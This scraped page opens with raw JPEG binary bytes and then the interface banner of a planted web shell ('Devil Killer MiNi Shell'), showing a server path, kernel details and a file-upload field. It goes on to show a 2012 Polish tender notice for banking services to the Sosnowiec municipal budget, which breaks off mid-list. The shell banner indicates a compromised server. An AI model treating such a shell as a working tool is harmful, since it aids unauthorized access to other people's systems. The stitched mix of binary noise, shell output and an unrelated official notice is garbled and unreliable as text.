JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/445136-N-2012.html

<p class="kh_header"><b>Sosnowiec: BANKOWA OBSŁUGA BUDŻETU GMINY SOSNOWIEC</b><br>
<b>Numer ogłoszenia: 445136 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BANKOWA OBSŁUGA BUDŻETU GMINY SOSNOWIEC.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie bankowej obsługi budżetu gminy Sosnowiec i jej jednostek organizacyjnych, obejmującej:<br>
1. Otwarcie i prowadzenie rachunków bankowych, w tym:<br>
1.1. 44 rachunków bieżących w złotych polskich;<br>
1.2. 280 rachunków pomocniczych w złotych polskich;<br>
1.3. 2 rachunków pomocniczych w USD;<br>
1.4. 26 rachunków pomocniczych w EURO.<br>
2. Zapewnienie elektronicznego systemu obsługi bankowej.<br>
Zamawiający wymaga, aby wykonawca do realizacji usługi obejmującej BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC udostępnił elektroniczny system obsługi bankowej umożliwiający realizację następujących operacji:<br>
2.1. Internetowego dostępu do systemu w oparciu o technologię szyfrowania SSL w wersji co najmniej 3.0 z kluczem szyfrującym co najmniej 128 bit;<br>
2.2. Autoryzacji zleceń i działań w systemie przy wykorzystaniu klucza podpisu zachowanego na zewnętrznych urządzeniach kryptograficznych takich jak: nośnik kryptograficzny USB, karta kryptograficzna lub inne służące do zapisania klucza podpisu;<br>
2.3. Pełnego zastosowania podpisu elektronicznego, zgodnie z systemem pełnomocnictw złożonych przez zamawiającego;<br>
2.4. Logowania się do systemu jedynie z publicznych adresów IP wskazanych przez zamawiającego;<br>
2.5. Dostępu do systemu tylko dla uwierzytelnionych użytkowników;<br>
2.6. Określenia szczegółowego dostępu użytkownika do funkcji w systemie (w szczególności do poszczególnych rachunków);<br>
2.7. Pełnego odseparowania dostępu do rachunków specjalnych (płacowego) w zakresie uprawnień podglądu, wyciągów i operacji dokonywanych na wskazanym rachunku;<br>
2.8. Zlecania - dokonywania operacji bankowych jedynie ze wskazanych przez zamawiającego adresów IP;<br>
2.9. Identyfikowania płatności masowych w zakresie wpłat z tytułu: podatków, opłat lokalnych i innych należności stanowiących dochody gminy, Skarbu Państwa;<br>
2.10.	Dokonywania przelewów krajowych w dniu ich złożenia najbliższą sesją Elixir, Sorbnet;<br>
2.10.1. wymagane są 3 sesje rozliczeniowe w systemie ELIXIR, przy czym zlecenia wysłane przez zamawiającego do godziny 15:00 muszą zostać przekazane do rozliczenia w tym samym dniu w ramach III sesji ELIXIR.<br>
2.11. Dokonywania przelewów pomiędzy rachunkami w banku wykonawcy bez zbędnej zwłoki, nie dłużej niż w ciągu 15 minut od złożenia zlecenia;<br>
2.12. Dokonywania przelewów z datą przyszłą przelewu;<br>
2.13. Dokonywania przelewów grupowych stosownie do okresu rozliczeniowego (np. płatności wobec ZUS, Urzędu Skarbowego itp.);<br>
2.14. Przesyłania danych w formie elektronicznej obejmujących duże zbiory przelewów;<br>
2.15.	Dokonywania płatności zagranicznych zgodnie ze standardem SWIFT;<br>
2.16. Szybkiego dostępu do aktualnych informacji o stanie środków na rachunkach i przeprowadzonych transakcjach, w tym:<br>
2.16.1. sporządzanie raportów z operacji na poszczególnych rachunkach (dla określonego rachunku i dla grupy rachunków);<br>
2.16.2. podgląd aktualnego salda na wybranym rachunku lub na wybranych grupach rachunków;<br>
2.16.3. pobieranie wyciągów w postaci plików PDF;<br>
2.16.4. drukowanie pojedynczych potwierdzeń transakcji uznaniowych i obciążeniowych zarejestrowanych na rachunkach bankowych wraz z możliwością zapisu danych w formacie plików PDF;<br>
2.16.5. bezpośrednie połączenie aplikacji księgowej z serwerem bankowym i bezpośredniej wymiany danych - (import przelewów wystawionych w systemie finansowo - księgowym zamawiającego);<br>
2.16.6. bierny wgląd w saldo wszystkich rachunków bankowych i wyciągów bankowych jednostek organizacyjnych zamawiającego przez wskazane przez zamawiającego osoby;<br>
2.16.7. przegląd realizowanych transakcji w ujęciu historycznym z uwzględnieniem rodzaju operacji, nazwy kontrahenta, daty i kwoty transakcji.<br>
3. Realizację poleceń przelewów (w formie elektronicznej) z wszystkich rachunków zamawiającego na rachunki zadysponowane za pomocą dostępnych międzyoddziałowych i międzybankowych systemów rozliczeniowych.<br>
4. Wydawanie blankietów czeków gotówkowych - zakupionych przez zamawiającego i ich realizację (dopuszcza się również zastąpienie blankietów czeków gotówkowych czekami generowanymi przy wykorzystaniu elektronicznego systemu obsługi bankowej).<br>
5. Dokonywanie operacji wpłat zamkniętych.<br>
6. Dokonywanie wypłat gotówkowych, w placówkach wykonawcy, z wszystkich rachunków zamawiającego przez osoby upoważnione, wskazane przez zamawiającego - wypłaty gotówkowe będą zlecane przy pomocy blankietów czeków gotówkowych, zakupionych przez zamawiającego, lub przy pomocy czeków generowanych przy wykorzystaniu elektronicznego systemu obsługi bankowej.<br>
7. Dokonywanie rozliczeń płatności masowych na rzecz zamawiającego i przekazywanie informacji o płatnościach dokonanych przez wpłacających.<br>
8. Sporządzanie w formie papierowej wyciągów bankowych za każdy dzień dla jednego, wskazanego przez zamawiającego, rachunku bankowego oraz w przypadku wystąpienia awarii elektronicznego systemu obsługi bankowej sporządzanie w formie papierowej wyciągów bankowych za każdy dzień dla wszystkich rachunków bankowych zamawiającego.<br>
9. Wydawanie i wznawianie debetowych kart przedpłaconych dla wskazanych przez zamawiającego świadczeniobiorców w celu dokonywania wypłat, w szczególności: świadczeń rodzinnych, zasiłków.<br>
9.1. Karty te:<br>
9.1.1.	 muszą umożliwiać dokonywanie płatności bezgotówkowych w placówkach handlowo-usługowych zlokalizowanych na terenie Rzeczypospolitej Polskiej;<br>
9.1.2.	 muszą umożliwiać wypłacanie gotówki w co najmniej 5 bankomatach zlokalizowanych w granicach administracyjnych gminy Sosnowiec.<br>
9.1.3. Powinny mieć okres ważności minimum 3 lata;<br>
9.1.4. Będą obciążone jednorazową opłatą za ich wydanie i obsługę, w tym również za wydanie i obsługę ich duplikatu w przypadku ich zagubienia, zniszczenia bądź kradzieży (jedyna opłata związana z obsługą debetowych kart przedpłaconych jaką pobierze wykonawca);<br>
10. Wydawanie i wznawianie obciążeniowych kart typu charge dla dokonywania transakcji płatniczych bezgotówkowych na terenie Rzeczypospolitej Polskiej i poza jej terytorium.<br>
11. Wydawanie i wznawianie debetowych kart płatniczych dla dokonywania transakcji płatniczych bezgotówkowych, pobierania gotówki z bankomatów na terenie Rzeczypospolitej Polskiej.<br>
12. Udzielenie zamawiającemu w roku 2013 na okres maksymalnie 8 miesięcy, tj. 244 dni - kredytu bieżącego w rachunku podstawowym budżetu gminy (dalej: kredytu) w wysokości określonej przez Radę Miejską w Sosnowcu w uchwale budżetowej. Zamawiający informuje, że kwota kredytu w okresie obowiązywania umowy zawartej w wyniku rozstrzygnięcia niniejszego postępowania nie przekroczy 10 mln złotych polskich.<br>
12.1. Uruchomienie kredytu może nastąpić po przekazaniu wykonawcy stosownej uchwały Rady Miejskiej oraz podpisaniu odrębnej umowy o kredyt w rachunku;<br>
12.2.	Naliczanie i pobieranie odsetek od wykorzystanego kredytu będzie następowało każdego ostatniego dnia miesiąca;<br>
12.3.	Wysokość oprocentowania kredytu wykonawca ustalał będzie miesięcznie jako suma średniej arytmetycznej wysokości WIBOR 1M i marży mk określonej w ofercie. Przyjmuje się, że rok liczy 365 dni - do naliczania odsetek;<br>
12.4.	Odsetki od kredytu wykonawca naliczał będzie od kwoty faktycznie wykorzystanego przez zamawiającego kredytu i faktycznej rzeczywistej liczby dni wykorzystania kredytu;<br>
12.5. Każdy wpływ na rachunek podstawowy budżetu gminy będzie powodował zmniejszenie salda kredytu; zmniejszenie salda kredytu będzie również powodował wpływ środków uzyskanych wskutek konsolidacji rachunków;<br>
12.6.	Wykonawca nie będzie pobierał opłat z tytułu prowizji od niewykorzystanego kredytu, prowizji przygotowawczej od uruchomienia kredytu, ani żadnych innych opłat i prowizji;<br>
12.7.	Jedynym dopuszczalnym zabezpieczeniem spłaty kredytu będzie oświadczenie o poddaniu się egzekucji zgodnie z art. 97 ustawy z dnia 29 sierpnia 1997 roku Prawo bankowe (tekst jednolity - Dz. U. z 2002 r. Nr 72, poz. 665, ze zmianami).<br>
13. Prowadzenie skonsolidowanego rachunku gminy Sosnowiec, według poniżej określonych zasad:<br>
13.1. Przez rachunek skonsolidowany zamawiający rozumie dokonanie na koniec każdego dnia roboczego, po godzinie 18:00, z wyłączeniem ostatniego dnia każdego miesiąca, przeksięgowania, w sposób wirtualny, salda grupy rachunków (obejmujących rachunek podstawowy budżetu gminy i inne rachunki wskazane przez zamawiającego, w tym rachunki jednostek organizacyjnych zamawiającego).<br>
13.2.	W przypadku wystąpienia dodatniej sumy sald uzyskanej w wyniku konsolidacji środki zgromadzone na wirtualnym rachunku skonsolidowanym będą automatycznie lokowane w formie lokat terminowych typu overnight i weekendowych (bez ponoszenia żadnych opłat z tego tytułu);<br>
13.2.1. Wysokość oprocentowania lokat na rachunkach podlegających konsolidacji wykonawca ustalał będzie każdorazowo w oparciu o stawkę WIBID ON pomniejszoną o pewną stałą nie ujemną marżę, którą zaproponuje zamawiającemu w złożonej ofercie.<br>
13.3.	Zasady dotyczące lokowania środków, określone powyżej, będą obowiązywać pod warunkiem, że oprocentowanie lokat terminowych będzie wyższe niż oprocentowanie środków zgromadzonych na rachunkach bieżących;<br>
13.4.	Kapitalizacja odsetek będzie następować każdego ostatniego dnia miesiąca. Odsetki z tytułu oprocentowania środków na rachunku skonsolidowanym będą przekazywane na rachunek podstawowy budżetu gminy w postaci jednej kwoty;<br>
13.5.	W sytuacji, gdy na rachunku podstawowym budżetu gminy wystąpi saldo debetowe - suma sald uzyskana wskutek konsolidacji posłuży do zredukowania salda kredytu;<br>
13.6.	Wykonawca będzie codziennie sporządzał i przekazywał raport z konsolidacji sald (dopuszcza się przekazywanie danych w formie dziennego raportu przesyłanego elektronicznie);<br>
13.7.	Zmiana rachunków podlegających konsolidacji nie będzie wymagać sporządzenia aneksu do umowy, a jedynie powiadomienia w formie pisemnej wykonawcy o konieczności wprowadzenia zmian.<br>
14. W każdym ostatnim dniu miesiąca salda rachunków, które podlegają konsolidacji będą pomniejszane o należne opłaty bankowe a następnie przekazywane automatycznie na rachunek podstawowy budżetu gminy i lokowane zgodnie z zasadami określonymi w punkcie 13.2.<br>
15. Oprocentowanie środków pieniężnych na rachunkach bankowych niepodlegających konsolidacji.<br>
15.1.	Naliczanie i kapitalizowanie odsetek od środków na rachunkach bankowych będzie następowało każdego ostatniego dnia miesiąca;<br>
15.2.	Każdego ostatniego dnia miesiąca środki pieniężne uzyskane z oprocentowania będą automatycznie przekazywane z poszczególnych rachunków bankowych podlegających oprocentowaniu na rachunek wskazany przez zamawiającego.<br>
15.3. Wysokość oprocentowania środków pieniężnych na rachunkach bankowych niepodlegających konsolidacji wykonawca ustalał będzie każdorazowo w oparciu o stawkę WIBID 1M pomniejszoną o pewną stałą nieujemną marżę, którą zaproponuje zamawiającemu w złożonej ofercie.<br>
16. Lokowanie wolnych środków pieniężnych na lokatach terminowych tygodniowych i miesięcznych.<br>
16.1. Naliczanie i kapitalizowanie odsetek w zakresie lokowania wolnych środków pieniężnych na lokatach terminowych tygodniowych i miesięcznych będzie następowało odpowiednio:<br>
16.1.1. dla lokat terminowych - tygodniowych - w ostatnim siódmym dniu licząc od dnia założenia lokaty tygodniowej;<br>
16.1.2. dla lokat terminowych - miesięcznych - w ostatnim trzydziestym dniu licząc od dnia założenia lokaty miesięcznej.<br>
16.2. Wysokość oprocentowania lokat terminowych - tygodniowych wykonawca ustalał będzie każdorazowo w oparciu o stawkę WIBID 1W pomniejszoną o pewną stałą nieujemną marżę, którą zaproponuje zamawiającemu w złożonej ofercie.<br>  
16.3. Wysokość oprocentowania lokat terminowych - miesięcznych wykonawca ustalał będzie każdorazowo w oparciu o stawkę WIBID 1M pomniejszoną o pewną stałą nieujemną marżę, którą zaproponuje zamawiającemu w złożonej ofercie.<br>  
17. Pozostałe usługi bankowe, w tym:<br>
17.1.	Wydawanie opinii bankowych i zaświadczeń na życzenie zamawiającego;<br>
17.2.	Doradztwo finansowe w ramach objętych umową rachunków bankowych, w tym: pozyskiwanie kredytów preferencyjnych, lokowanie wolnych środków;<br>
17.3.	Zapewnienie obsługi zamawiającego w co najmniej czterech placówkach wykonawcy z obsługą gotówkową zlokalizowanych w granicach administracyjnych gminy Sosnowiec;<br>
17.4.	Zamawiający wymaga, aby umowa na BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC została zawarta odrębnie z gminą Sosnowiec oraz odrębnie z każdą z jej jednostek organizacyjnych. W przypadku łączenia, przekształcenia bądź utworzenia nowych jednostek organizacyjnych gminy, wykonawca podpisze z nimi umowę na prowadzenie obsługi bankowej na takich samych zasadach i warunkach, jakie zostaną określone w umowie podpisanej w wyniku niniejszego postępowania w zakresie przedmiotu objętego ofertą wykonawcy.<br>
18. Pobieranie opłat bankowych z tytułu wykonania operacji finansowych na poszczególnych rachunkach bankowych każdego ostatniego dnia miesiąca i dokonywanie automatycznej refundacji kosztów z jednego, wskazanego przez zamawiającego rachunku bankowego.<br>
19. Zamawiający wymaga, aby wykonawca nie pobierał żadnych opłat za:<br>
19.1.	Wyciągi bankowe pobierane w formie elektronicznej przez zamawiającego przy pomocy elektronicznego systemu obsługi bankowej jak również za wyciągi papierowe wydawane w przypadku wystąpienia awarii elektronicznego systemu obsługi bankowej;<br>
19.2.	Wykonywanie operacji przy użyciu debetowych kart przedpłaconych od ich posiadaczy przy ich użyciu w placówkach wykonawcy i bankomatach należących do wykonawcy (transakcje gotówkowe i bezgotówkowe);<br>
19.3.	Wydawanie duplikatów debetowych kart przedpłaconych w przypadku ich zagubienia, zniszczenia bądź kradzieży;<br>
19.4.	Wypłaty gotówki dokonane przy pomocy debetowych kart płatniczych z bankomatów należących do wykonawcy;<br>
19.5.	Zapewnienie przyjmowania wpłat gotówkowych od zamawiającego i od osób trzecich na rachunki zamawiającego i jego jednostek organizacyjnych w kasach we wszystkich placówkach wykonawcy znajdujących się w granicach administracyjnych gminy Sosnowiec;<br>
19.6.	Zapewnienie doradców do obsługi zamawiającego i jego jednostek organizacyjnych w zakresie bankowości i w obszarze bankowości elektronicznej;<br>
19.7.	Zapewnienie w okresie wdrożenia i po wdrożeniu (w okresie trwania umowy) przeszkolenia około 250 pracowników zamawiającego pracujących w elektronicznym systemie obsługi bankowej;<br>
19.8.	Przelewy dokonywane pomiędzy rachunkami bankowymi należącymi do zamawiającego i jego jednostek organizacyjnych (prowadzonymi na podstawie umów podpisanych w wyniku niniejszego postępowania);<br>
19.9.	Prowadzenie skonsolidowanego rachunku bankowego gminy Sosnowiec.<br>
19.10. Sporządzanie i przekazywanie raportu z konsolidacji sald;<br>
19.11. Automatyczne lokowanie środków zgromadzonych na wirtualnym rachunku skonsolidowanym.<br>
19.12. Urządzenia kryptograficzne niezbędne w celu logowania i korzystania z elektronicznego systemu obsługi bankowej.<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0, 66.11.00.00-4, 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią warunki udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, w zakresie:<br>
1.1. posiadania uprawnień do wykonywania czynności bankowych obciążających ryzykiem środki powierzone pod jakimkolwiek tytułem zwrotnym.<br>
2. Za spełniających warunki udziału w niniejszym postępowaniu zamawiający uzna wykonawców, którzy wykażą spełnianie:<br>
2.1. warunku posiadania uprawnień do wykonywania czynności bankowych obciążających ryzykiem środki powierzone pod jakimkolwiek tytułem zwrotnym, wykażą, że są osobami prawnymi utworzonymi zgodnie z przepisami ustaw, działającymi na podstawie zezwoleń uprawniających do wykonywania czynności bankowych obciążających ryzykiem środki powierzone pod jakimkolwiek tytułem zwrotnym, wypełniającymi tym samym treść definicji Banku zawartą w art. 2 ustawy z dnia 29 sierpnia 1997 r. - Prawo bankowe (tekst jednolity - Dz. U. z 2002 r. Nr 72, poz. 665, ze zmianami).<br></p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią warunki udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, w zakresie:<br>
1.1. posiadania wiedzy i doświadczenia w zakresie prowadzenia przez co najmniej jeden rok bankowej obsługi budżetu dla co najmniej jednej jednostki samorządu terytorialnego i jej jednostek organizacyjnych o rocznym budżecie nie mniejszym niż 500 milionów złotych.<br>
2. Za spełniających warunki udziału w niniejszym postępowaniu zamawiający uzna wykonawców, którzy wykażą spełnianie:<br>
2.1. warunku posiadania wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie wykonania co najmniej jednej usługi polegającej na prowadzeniu bankowej obsługi budżetu, dla co najmniej jednej jednostki samorządu terytorialnego i jej jednostek organizacyjnych przez okres co najmniej 12 miesięcy, której wielkość rocznego budżetu w okresie prowadzenia obsługi była nie mniejsza niż 500 milionów złotych, a jeżeli usługa jest w trakcie wykonywania powinna być realizowana co najmniej przez 12 miesięcy.<br></p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią warunki udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, w zakresie:<br>
1.1. dysponowania odpowiednim potencjałem technicznym.<br>
2. Za spełniających warunki udziału w niniejszym postępowaniu zamawiający uzna wykonawców, którzy wykażą spełnianie:<br>
2.1. warunku dysponowania odpowiednim potencjałem technicznym - wykonawca dysponuje lub będzie dysponował co najmniej czterema placówkami z obsługą gotówkową na terenie miasta Sosnowca, w których jednocześnie będą czynne co najmniej po dwa stanowiska kasowe.<br></p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią warunki udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, w zakresie:<br>
1.1. dysponowania osobami zdolnymi do wykonania zamówienia.<br>
2. Za spełniających warunki udziału w niniejszym postępowaniu zamawiający uzna wykonawców, którzy wykażą spełnianie:<br>
2.1. warunku dysponowania osobami zdolnymi do wykonania zamówienia - wykonawca dysponuje lub będzie dysponował co najmniej dwiema osobami, w tym: jedną w charakterze doradcy bankowego, drugą w charakterze doradcy technicznego odpowiedzialnego za obszar bankowości elektronicznej, dedykowanymi do obsługi zamawiającego i jego jednostek organizacyjnych.<br></p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią warunki udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, w zakresie:<br>
1.1. sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia.<br>
2. Za spełniających warunki udziału w niniejszym postępowaniu zamawiający uzna wykonawców, którzy wykażą spełnianie:<br>
2.1. warunku takiej sytuacji ekonomicznej i finansowej, w której wykonawca posiada współczynnik wypłacalności obliczony zgodnie ze standardami Narodowego Banku Polskiego za ostatni rok obrachunkowy (2011) nie niższy niż 11%. Zamawiający uzna sytuację ekonomiczną i finansową wykonawcy za zapewniającą wykonanie niniejszego zamówienia, jeżeli wykonawca wykaże, że za ostatni rok obrachunkowy (2011) osiągnął współczynnik wypłacalności obliczony zgodnie ze standardami Narodowego Banku Polskiego nie niższy niż 11%.<br></p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

